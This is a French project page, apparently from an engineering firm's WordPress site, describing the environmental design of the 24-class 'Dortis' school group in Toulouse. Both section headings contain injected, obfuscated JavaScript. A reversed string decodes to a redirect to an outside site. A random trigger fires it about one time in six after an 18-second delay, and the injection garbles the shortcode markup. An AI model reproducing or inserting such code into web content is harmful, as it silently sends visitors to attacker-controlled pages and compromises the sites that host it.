[wpc_custoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_heading heading= »Spécifications » colored_line= »yes » size= »medium »]

Lieu : Toulouse (31)
SRT :  5 500 m²
Montant des travaux : 9 000 000 € HT
Mission réalisée : Maîtrise d’œuvre Environnementale
Architecte : REC ARCHITECTURE
Maître d’Ouvrage : Ville de Toulouse
Année : Début études Mai 2021

[wpc_custoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_heading heading= »Information sur le projet » colored_line= »yes » size= »medium »]

Cette opération prévoit la construction du groupe scolaire « Dortis » en remplacement des locaux provisoires actuels. Cette future école primaire aura une capacité de 24 classes (10 maternelles +14 élémentaires) afin de répondre aux besoins actuels et futurs.
Le projet est inscrit dans une Démarche Environnementale globale. Une attention particulière a été portée sur le confort thermique, acoustique et visuel dans les espaces occupés par les enfants. Le projet bénéficie d’une conception bioclimatique validée par des simulations thermiques dynamiques et des études d’éclairage naturel.
L’accent est également mis sur la sobriété énergétique afin de limiter les consommations énergétiques et de répondre aux exigences du label Energie-Carbone niveau E4C1.